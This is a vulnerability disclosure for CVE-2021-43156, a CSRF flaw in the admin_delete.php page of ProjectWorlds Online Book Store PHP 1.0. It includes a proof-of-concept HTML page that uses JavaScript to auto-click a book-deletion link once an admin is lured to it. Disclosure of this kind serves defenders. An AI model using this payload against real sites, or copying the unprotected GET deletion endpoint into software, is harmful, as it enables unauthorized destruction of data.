Headline

CVE-2021-43156: CSRF vulnerability in admin_delete.php allows a remote attacker to delete any book · Issue #19 · projectworldsofficial/online-book-store-project-in-php

In ProjectWorlds Online Book Store PHP 1.0 a CSRF vulnerability in admin_delete.php allows a remote attacker to delete any book.

2 years ago

CVE

Open in Source

#csrf #vulnerability #web #git #java

Author

KhanhCM (@khanhchauminh)

Version: 1.0****Details

The GET request for deleting a book with ISBN=12345 looks like this:

http://127.0.0.1:8888/admin_delete.php?bookisbn=12345

Changing the value of the bookisbn parameter under admin privilege will delete the book with that ISBN.
A remote attacker can embed the request into an innocent-looking hyperlink:

<a href="http://127.0.0.1:8888/admin_delete.php?bookisbn=12345">View</a>

Step to reproduce

First, create a malicious HTML page then host a website containing that page.

PoC:

<html>
<head>
  <title>CSRF PoC</title>
</head>
<body>
  <p>CSRF PoC</p>
  <a id='link' href="http://127.0.0.1:8888/admin_delete.php?bookisbn=12345">View</a>
  <script>
    document.getElementById('link').click();
  </script>
</body>
</html>

Entice the admin to click on the link to the malicious site. When the admin browses to that site, the link would be automatically clicked via JavaScript and the book will be deleted.

Response in Burpsuite